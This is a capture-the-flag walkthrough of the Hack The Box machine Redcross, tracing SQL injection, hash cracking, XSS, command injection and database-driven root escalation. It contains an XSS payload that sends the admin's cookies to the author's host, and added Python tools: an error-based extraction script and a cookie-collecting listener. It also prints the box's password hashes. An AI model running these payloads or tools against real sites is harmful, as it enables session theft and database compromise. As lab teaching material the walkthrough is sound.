Redcross writeup: Summary
This writeup is about Redcross on Hack The Box, a Linux box. It starts with web exploitation: XSS against the admin user to steal his cookie and log in to the admin panel, then command injection in the firewall page to get a shell as www-data. After some recon we find the credentials for the database that creates the system users. We add a user in the root group (gid 0), log back in as that user, enumerate further and find privileged database credentials, with which we create a user with uid 0, su to it and get root.
I did an Nmap scan and found ports 22, 80 and 443 open. There wasn't much information in the results, except that the TLS certificate on port 443 names a subdomain, https://intra.redcross.htb, and both web ports redirect there. That's all the scan gives us, so let's look at the Nmap results.
Nmap scan report for redcross.htb (10.10.10.113)
Host is up (0.51s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
|   2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
|   256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_  256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp  open  http     Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open  ssl/http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after:  2021-02-27T19:46:58
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I added the domain and the subdomain to my /etc/hosts file and had a look at the TLS certificate on intra.redcross.htb. Then I started my background recon before looking at the web application itself.
First I ran gobuster against intra.redcross.htb and it found some directories. The documentation directory sounded interesting, so I ran a second gobuster against it looking for .pdf and .txt files. That turned up account-signup.pdf, which has instructions for signing up for a new account.
The intra. name suggested there might be other subdomains, so I used wfuzz to fuzz the Host header for virtual hosts, hiding the 28-word response that every unknown hostname returns (--hw 28).
wfuzz -H 'Host: FUZZ.redcross.htb' -u 'https://10.10.10.113' -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hw 28

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: https://10.10.10.113/
Total requests: 484700

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000071:   302        0 L      18 W     363 Ch      "admin"

Finishing pending requests...
That found a virtual host called admin.redcross.htb, which I added to /etc/hosts as well. I had a look at it but left it for later, since we had already found a way to sign up.
So I followed the instructions in the PDF. Trying to sign up for a user only gave me temporary credentials, guest:guest, so I logged in as guest. There wasn't much on the page apart from a filter field. Adding a single quote after the value 1 produced a SQL error, so I suspected SQL injection, but nothing I tried returned any output in the page itself. So I looked for a way to get data out through the error message instead: MySQL's extractvalue() function raises an XPath syntax error that echoes the offending expression, so if the result of a subquery is passed in as the XPath it gets reflected in the error (error-based injection).
'5' or dest like '1'') LIMIT 10'
'5' or dest like '<injection>') LIMIT 10'

assumption - select message from table where (message like '5' or dest like '<injection>') LIMIT 10'

1')-- -

to get the version of the db in error message
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,version())-- - !!') LIMIT 10'

to extract DB names
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1)))-- - !!') LIMIT 10'
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)))-- - !!') LIMIT 10'
--dbname redcross

To extract Table names
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA like "redcross" LIMIT 1,1)))-- - !!') LIMIT 10'
-- tables: messages, requests, users

To extract Column names
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME like "users" LIMIT 0,1)))-- - !!') LIMIT 10'
--COLUMNS id, username, password, mail, role

to extract usernames:-
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select username from users LIMIT 0,1)))-- - !!') LIMIT 10'
--usernames admin, penelope, charles, tricia, guest

to extract passwords
select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 0,1) from 1)))-- - !!') LIMIT 10'
--passwords
admin:$2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
penelope:$2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
tricia:$2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
guest:$2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi
In the notes above, the text between the two !! markers is what I actually injected into the filter field; the query around it is my assumption about what the server runs. The comments after -- helped me keep track of the data I had already extracted.
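The notes above show the queries but not the mechanics of pulling a long value out through the error. Below is an added example (not part of the original writeup) that automates the extractvalue() technique: it builds the filter value, parses the MySQL error text, and reassembles the result in slices, because MySQL/MariaDB truncate the string echoed in an XPATH syntax error to 32 characters, which is why the last note above uses substring(). The injection context is the one assumed in the notes; the "backend" at the bottom is a constructed stand-in that emulates the error message so the script runs offline.

```python
"""Automating the extractvalue() error-based extraction from the notes above.

Added example, not the writeup's own code.  MySQL/MariaDB cut the string
echoed in an 'XPATH syntax error' to 32 characters, so a 60-character bcrypt
hash has to be pulled out in slices.  Nothing here touches the network; the
backend below is a constructed stand-in that emulates the error message.
"""
import re
from typing import Callable, Optional

CHUNK = 31  # 32-character error budget minus the 0x0a marker we prepend


def build_payload(subquery: str, offset: int = 1) -> str:
    """Filter-field value that leaks one slice of `subquery`'s result.

    Assumes the injection point from the writeup: the value lands inside
      ... where (message like '5' or dest like '<value>') LIMIT 10
    so we close the string and parenthesis, add our extractvalue() call and
    comment out the rest.  `offset` is 1-based, as in MySQL's SUBSTRING.
    """
    leak = f"substring(({subquery}) from {offset} for {CHUNK})"
    return f"') and extractvalue(0x0a,concat(0x0a,{leak}))-- -"


# The 0x0a marker comes back either as a real newline or as the two
# characters \n depending on how the application echoes the error; accept both.
ERROR_RE = re.compile(r"XPATH syntax error: '(?:\\n|\n)?([^']*)'")


def parse_leak(response_body: str) -> Optional[str]:
    """Return the slice echoed in the XPath error, or None if there is none."""
    m = ERROR_RE.search(response_body)
    return m.group(1) if m else None


def extract(subquery: str, send: Callable[[str], str]) -> str:
    """Reassemble the whole value by requesting CHUNK-sized slices.

    `send(filter_value)` performs one request and returns the response body.
    A slice shorter than CHUNK marks the end of the value.
    """
    out, offset = "", 1
    while True:
        leaked = parse_leak(send(build_payload(subquery, offset)))
        if leaked is None:
            raise RuntimeError("no XPATH error in response: injection point changed?")
        out += leaked
        if len(leaked) < CHUNK:
            return out
        offset += CHUNK


# --- constructed stand-in for the vulnerable page (not the real target) ----
CHARLES_HASH = "$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i"


def fake_backend(filter_value: str) -> str:
    """Emulate MySQL evaluating our payload against charles's hash."""
    m = re.search(r"from (\d+) for (\d+)", filter_value)
    start, length = int(m.group(1)), int(m.group(2))
    return ("SQL error: XPATH syntax error: '\\n"
            + CHARLES_HASH[start - 1:start - 1 + length] + "'")


if __name__ == "__main__":
    q = "select password from redcross.users limit 2,1"
    print(build_payload(q))
    print(extract(q, fake_backend))
```

Against the real target, `send` would be a function that puts the returned string into the filter field with the guest session cookie and returns the response body; the slice loop and the error parser stay the same.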
That is how I got all the usernames and password hashes. I ran hashcat against the bcrypt hashes and it cracked one: the password for user charles is cookiemonster.
$ hashcat --example-hashes | grep 3200 -A 3
--
MODE: 3200
TYPE: bcrypt $2*$, Blowfish (Unix)
HASH: $2a$05$MBCzKhG1KhezLh.0LRa0Kuw12nLJtpHy6DIaU.JAnqJUDYspHC.Ou
PASS: hashcat
--

$ hashcat -m 3200 -O /root/Desktop/HackTheBox-Machines/Redcross/redcross.users /usr/share/wordlists/rockyou.txt --user --force

$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i:cookiemonster

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: /root/Desktop/HackTheBox-Machines/Redcross/redcross.users
Time.Started.....: Sun Apr 26 03:48:28 2020 (1 sec)
Time.Estimated...: Sun Apr 26 03:48:29 2020 (0 secs)
Guess.Base.......: File (cheatlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        3 H/s (0.13ms) @ Accel:4 Loops:2 Thr:8 Vec:8
Recovered........: 1/5 (20.00%) Digests, 1/5 (20.00%) Salts
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 1/1 (100.00%)
Restore.Sub.#1...: Salt:4 Amplifier:0-1 Iteration:1022-1024
Candidates.#1....: cookiemonster -> cookiemonster
Logged in as charles, I found messages on his dashboard about a problem with the admin website. They say alerts are popping up everywhere, which suggests the admin site is vulnerable to cross-site scripting. So I assumed there is a simulated admin user, and that we have to use an XSS payload to steal his cookie and get admin on the web application.
In the last message charles also says he fixed the contact form, so maybe a simulated user reads whatever is submitted through the contact form.
If we can get his cookies we can hijack his session. I tried different combinations, all of which failed, until I put a script tag in the number field of the form, and we got the admin's cookie:

<script>document.write('<img src="https://10.10.14.8/collect.gif?cookie=' + document.cookie + '" />')</script>

The payload writes an image tag pointing at my host, so the admin's browser sends its cookies to me in the query string of the image request. Replacing my cookie with the admin's gave me access to the admin dashboard.
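The writeup shows the payload but not the receiving end. The following is an added example, not code from the original post: a small listener for the collect.gif request that logs the stolen cookie and answers with a 1x1 GIF so the admin page shows no broken image. It listens on plain HTTP, so with this listener the payload's URL would begin with http:// rather than the https:// shown above (that scheme is an assumption of this example). One caveat worth remembering: document.cookie only exposes cookies set without the HttpOnly flag, so an HttpOnly session cookie would have defeated this step entirely.

```python
"""Listener for the cookie-stealing <img> payload above.

Added example, not the writeup's own code.  The injected tag makes the
admin's browser request /collect.gif?cookie=<document.cookie> from the
attacker host; this server logs that value and returns a 1x1 GIF.
"""
import base64
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Smallest transparent 1x1 GIF, so the browser sees a real image.
PIXEL = base64.b64decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7")


def cookies_from_path(path: str) -> dict:
    """Turn '/collect.gif?cookie=PHPSESSID%3Dabc%3B%20lang%3Den' into
    {'PHPSESSID': 'abc', 'lang': 'en'}.  parse_qs undoes the percent-encoding
    the browser applied when it put document.cookie into the URL."""
    raw = parse_qs(urlparse(path).query).get("cookie", [""])[0]
    out = {}
    for pair in raw.split(";"):
        if "=" in pair:
            name, value = pair.strip().split("=", 1)
            out[name] = value
    return out


class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        stolen = cookies_from_path(self.path)
        if stolen:
            print(f"[+] {self.client_address[0]} cookies: {stolen}", flush=True)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

    def log_message(self, *args):  # keep the console to the stolen cookies only
        pass


if __name__ == "__main__":
    # Port 80 needs root; pass another port as the first argument otherwise.
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 80
    print(f"[*] collecting on 0.0.0.0:{port}", flush=True)
    HTTPServer(("0.0.0.0", port), Collector).serve_forever()
```

Once the admin's simulated browser fetches the image, the session cookie appears on the console and can be set in your own browser exactly as described above.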
The dashboard has a firewall page and a user management page. I added a user in user management and was given an SSH username and password. Logging in as that user, I found a restricted chroot shell that doesn't even have a complete Linux filesystem.
After getting nowhere with that shell, I explored the firewall page for a while. If you whitelist your own IP in the firewall it shows you more open ports, but I didn't find anything interesting on them. Judging from the input and output, the backend seemed to be running iptables commands, so I tried command injection and found it in the firewall's deny function. That gave me a shell as the www-data user on the box.
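The page doesn't reproduce the firewall code or the exact payload, so what follows is an added illustration of the bug class rather than the box's own code (which lives in PHP in actions.php, not shown here): an IP taken from the request is pasted into an iptables command line, and the hardened version next to it validates the input as an address or CIDR and passes it as a separate argv element so no shell ever parses it. The attacker string is constructed; nothing runs iptables unless run_deny() is called with dry_run=False.

```python
"""Command injection in an iptables wrapper: vulnerable shape beside a fixed one.

Added example, not the box's own code.  It shows the bug class the firewall
page had: a user-supplied IP pasted into a shell command line.
"""
import ipaddress
import subprocess


def deny_cmd_vulnerable(ip: str) -> str:
    """Builds the command the way a naive exec("iptables ... $ip") would.
    With ip = '10.10.14.8; id' the shell runs 'id' after iptables."""
    return f"iptables -A INPUT -s {ip} -j DROP"


def deny_cmd_hardened(ip: str) -> list:
    """Validate the input as an address or CIDR first, then return argv
    elements for shell=False execution.  Raises ValueError on anything
    that is not an IP network, including '10.10.14.8; id'."""
    net = ipaddress.ip_network(ip.strip(), strict=False)
    return ["iptables", "-A", "INPUT", "-s", str(net), "-j", "DROP"]


def run_deny(ip: str, dry_run: bool = True) -> list:
    """Apply the rule with the hardened builder (no shell involved)."""
    argv = deny_cmd_hardened(ip)
    if not dry_run:
        subprocess.run(argv, check=True)
    return argv


if __name__ == "__main__":
    payload = "10.10.14.8; id"  # constructed attacker input
    print("vulnerable:", deny_cmd_vulnerable(payload))
    print("hardened  :", run_deny("10.10.14.8"))
    try:
        run_deny(payload)
    except ValueError as e:
        print("hardened rejects payload:", e)
```

The validation step matters more than the argv split on its own: iptables happily accepts a hostname for -s, so without the ipaddress check an attacker could still make the server do a DNS lookup of their choosing.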
Redcross writeup: User
Now I started doing recon and found that actions.php contained a database username and password for the user unixusrmgr, which sounded like the account that created the system users when we added our test user in the user manager earlier. I logged into the psql shell with those credentials and found the users we had just made.
I used \d to list the tables; among them is passwd_table, which holds the user accounts.
unix=> \d
               List of relations
 Schema |     Name     |   Type   |  Owner
--------+--------------+----------+----------
 public | group_id     | sequence | postgres
 public | group_table  | table    | postgres
 public | passwd_table | table    | postgres
 public | shadow_table | table    | postgres
 public | user_id      | sequence | postgres
 public | usergroups   | table    | postgres

unix=> select * from passwd_table;
 username |               passwd               | uid  | gid  | gecos |    homedir     |   shell
----------+------------------------------------+------+------+-------+----------------+-----------
 tricia   | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 |       | /var/jail/home | /bin/bash
 ipp      | $1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ. | 2020 |    0 |       | /              | /bin/bash
 batman   | $1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ. |    0 |    0 |       | /              | /bin/bash
 bugs     | $1$KkZCHcOx$7DhQiKjOAiGlBOTvxZdVt0 | 2023 | 1001 |       | /var/jail/home | /bin/bash
(4 rows)

unix=> \dp
                                         Access privileges
 Schema |     Name     |   Type   |      Access privileges       |    Column privileges     | Policies
--------+--------------+----------+------------------------------+--------------------------+----------
 public | group_id     | sequence |                              |                          |
 public | group_table  | table    | postgres=arwdDxt/postgres   +|                          |
        |              |          | unixnss=r/postgres           |                          |
 public | passwd_table | table    | postgres=arwdDxt/postgres   +| username:               +|
        |              |          | unixnss=r/postgres          +|   unixusrmgr=aw/postgres+|
        |              |          | unixusrmgr=rd/postgres      +| passwd:                 +|
        |              |          | unixnssroot=arwdDxt/postgres |   unixusrmgr=aw/postgres+|
        |              |          |                              | gid:                    +|
        |              |          |                              |   unixusrmgr=aw/postgres+|

unix=> insert into passwd_table (username,passwd,gid,homedir) values('spiderman','$1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ.',0,'/');
INSERT 0 1
The table has the columns username, passwd, uid, gid, gecos, homedir and shell. I tried to create a user with elevated privileges, but inserting a uid failed: unixusrmgr doesn't have permission to set it. The \dp output explains why: the role has no INSERT on the table as a whole (only rd, i.e. SELECT and DELETE) and instead gets column-level INSERT/UPDATE grants (aw) on particular columns such as username, passwd and gid, and uid is not one of them. So I created a user with gid 0 instead, which puts the account in the root group and gives us more than www-data has.
Redcross writeup: Root
Now I SSHed in as spiderman and ran LinEnum.sh, which pointed out a file called nss-pgsql-root.conf in /etc. Running ls -ltr there to see the most recently modified files, this one stood out. It contained privileged PostgreSQL credentials.
I logged into the database with those and reused my earlier insert, this time setting uid 0 as well:
insert into passwd_table (username,passwd,uid,gid,homedir) values('batman','$1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ.',0,0,'/');
It was added successfully, but SSHing in as that user with its password didn't work, presumably because root logins over SSH are disabled. Running su batman with the same password from my spiderman shell, however, gave me a root shell.
If you liked this write-up or have any questions, please leave a comment below. Thanks for reading 🙂. Check out my other write-ups; Enterprise was my own favorite.